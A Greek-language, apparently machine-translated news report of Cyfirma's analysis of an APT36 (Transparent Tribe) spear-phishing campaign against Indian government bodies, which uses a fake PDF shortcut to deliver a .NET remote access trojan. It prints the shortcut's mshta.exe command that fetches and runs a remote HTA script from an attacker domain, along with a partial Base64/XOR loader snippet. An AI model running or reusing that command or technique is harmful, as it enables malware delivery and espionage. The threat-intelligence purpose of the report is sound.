Το APT36, γνωστό και ως Transparent Tribe, έχει ξεκινήσει μια νέα εκστρατεία κακόβουλου λογισμικού που στοχεύει ινδικές κυβερνήσεις και στρατηγικές οντότητες κάνοντας κατάχρηση των αρχείων συντόμευσης LNK των Windows.
Η επίθεση ξεκινά με emails spear-phishing που φέρουν ένα αρχείο ZIP με το όνομα “Online JLPT Exam Dec 2025.zip”, χρησιμοποιώντας ένα θέμα ειδοποίησης εξετάσεων για να παρασύρουν τους υπαλλήλους να ανοίξουν το συνημμένο.
Μόλις εξαχθεί, το αρχείο εμφανίζει ένα αρχείο που φαίνεται να είναι ένα κανονικό PDF, “Online JLPT Exam Dec 2025.pdf”, αλλά στην πραγματικότητα είναι ένα αρχείο συντόμευσης.
Αυτή η συντόμευση χρησιμοποιεί ένα τέχνασμα διπλής επέκτασης (.pdf.lnk). Τα Windows κρύβουν το τμήμα .lnk, επομένως ακόμη και οι χρήστες που βλέπουν επεκτάσεις αρχείων εξακολουθούν να βλέπουν αυτό που μοιάζει με PDF.
Το μέγεθος του αρχείου είναι πάνω από 2 MB, κάτι που είναι ασυνήθιστο για μια συντόμευση και πιο κοντά σε ένα πραγματικό PDF. Οι αναλυτές της Cyfirma εντόπισαν ότι το επιπλέον μέγεθος προέρχεται από μια πλήρη δομή PDF και πολλαπλές ενσωματωμένες εικόνες που είναι αποθηκευμένες μέσα στο LNK για να φαίνεται πιο πειστικό.
Ερευνητές της Cyfirma διάσημος ότι αυτή η καμπάνια έχει σχεδιαστεί για μακροπρόθεσμη κατασκοπεία, παρέχοντας στους εισβολείς δυνατότητες τηλεχειρισμού, κλοπής δεδομένων και παρακολούθησης μέσω ενός Trojan Remote Access (RAT) που βασίζεται στο .NET.
.webp.jpeg "Καμπάνια κακόβουλου λογισμικού APT36 που στοχεύει αρχεία Windows LNK για επίθεση σε κυβερνητικές οντότητες της Ινδίας")
Το κακόβουλο λογισμικό εκτελείται στη μνήμη, χρησιμοποιεί αξιόπιστα εργαλεία των Windows και συνομιλεί με τον διακομιστή εντολών και ελέγχου μέσω κρυπτογραφημένων καναλιών, καθιστώντας δυσκολότερο τον εντοπισμό και τον εντοπισμό των εργαλείων ασφαλείας.
Μηχανισμός μόλυνσης και αλυσίδα εκτέλεσης LNK
Όταν το θύμα ανοίγει την ψεύτικη συντόμευση PDF, τα Windows εκκινούν το mshta.exe από το System32 και μεταβιβάζουν ένα απομακρυσμένο σενάριο HTA ως επιχείρημα, αντί να ανοίξουν ένα έγγραφο.
.webp.jpeg "Καμπάνια κακόβουλου λογισμικού APT36 που στοχεύει αρχεία Windows LNK για επίθεση σε κυβερνητικές οντότητες της Ινδίας")
Η ανασκόπηση της συντόμευσης από τη Cyfirma δείχνει τη διαδρομή στόχο που καλεί έναν απομακρυσμένο φορτωτή στο innlive.in:-
mshta.exe "https://innlive.in/assets/public/01/jlp/jip.hta"Η δέσμη ενεργειών HTA εκτελείται σε ένα κρυφό παράθυρο, συρρικνώνει το πλαίσιο του προγράμματος περιήγησης στο μηδέν και, στη συνέχεια, χρησιμοποιεί προσαρμοσμένες ρουτίνες Base64 και XOR για να αποκωδικοποιήσει δύο κύρια μπλοκ ωφέλιμου φορτίου που ονομάζονται ReadOnly και WriteOnly στη μνήμη.
.webp.jpeg "Καμπάνια κακόβουλου λογισμικού APT36 που στοχεύει αρχεία Windows LNK για επίθεση σε κυβερνητικές οντότητες της Ινδίας")
Ένα δείγμα της λογικής JavaScript δείχνει αυτό το μοτίβο:-
function CDDownload(s){ /* base64 decode logic */ }
function ProcessSignal(str,k){ /* XOR loop */ }
var ReadOnly = USBContents(SyncDataToCD("HxgVCQYKYhx4Z2dAdEAKRQ4bC..."));Το ReadOnly αποδυναμώνει τους ελέγχους ασφαλείας του .NET και ορίζει το χρόνο εκτέλεσης, ενώ το WriteOnly φορτώνει ένα κρυπτογραφημένο DLL ως RAT απευθείας στη μνήμη. Ένας κρυφός φάκελος “usb” με usbsyn.pim πιθανότατα περιέχει επιπλέον κρυπτογραφημένα δεδομένα για μεταγενέστερα στάδια.
Για να διατηρείται ήρεμος ο χρήστης, το HTA ανακτά και ανοίγει ένα πραγματικό PDF εξέτασης JLPT, έτσι ώστε ολόκληρη η σειρά να μοιάζει με κανονική προβολή εγγράφων ενώ το σύστημα είναι ήδη σε κίνδυνο.
